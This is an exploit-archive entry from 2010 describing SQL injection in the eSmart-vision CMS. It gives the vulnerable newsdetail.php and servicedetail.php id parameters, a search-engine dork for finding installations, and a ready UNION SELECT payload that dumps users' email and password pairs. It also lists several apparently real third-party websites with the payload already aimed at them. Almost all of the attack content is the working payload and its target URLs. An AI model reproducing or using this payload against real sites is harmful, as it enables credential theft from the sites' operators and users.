eSmart-vision CMS Multiple SQL Injection Vulnerability

2010-07-05T00:00:00
ID 1337DAY-ID-13146
Type zdt
Reporter GlaDiaT0R
Modified 2010-07-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ======================================================
eSmart-vision CMS Multiple SQL Injection Vulnerability
======================================================


##############################################################################
# [+]Title: [eSmart-vision CMS Multiple SQL Injection Vulnerability]
##############################################################################
# [+] About :
==============================================================================
# Author :  GlaDiaT0R 
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team :  Tunisian Power Team
# Greetz : ALLAH ! , Boomrang_victim, Marwen_Neo, Alphanix, Zigma & my friends
#
# Software Link: www.esmart-vision.com/
# Google dork : [ intext:Powered By eSmart-vision.com ]
##############################################################################
# [+] Exploits :
==============================================================================
#
#       Path: http://localhost/newsdetail.php?id=[SQL]
#             http://localhost/servicedetail.php?id=[SQL]
#       Demo : -1994+union+all+select+1,2,group_concat(Email,0x3a,Password),4,5,6,7+from+userinfo--
#    http://www.mouafaqbtc.com/servicedetail.php?id=-1994+union+all+select+1,2,group_concat%28Email,0x3a,Password%29,4,5,6,7+from+userinfo--     
#    http://www.knowledgeme.org.uk/newsdetail.php?id=-1994+union+all+select+1,2,group_concat%28Email,0x3a,Password%29,4,5,6,7+from+userinfo--
#    http://www.aloolla.com/newsdetail.php?id=-1994+union+all+select+1,2,group_concat%28Email,0x3a,Password%29,4,5,6,7+from+userinfo--
##############################################################################
# Notice: I'M MUSLIM
##############################################################################



#  0day.today [2018-03-01]  #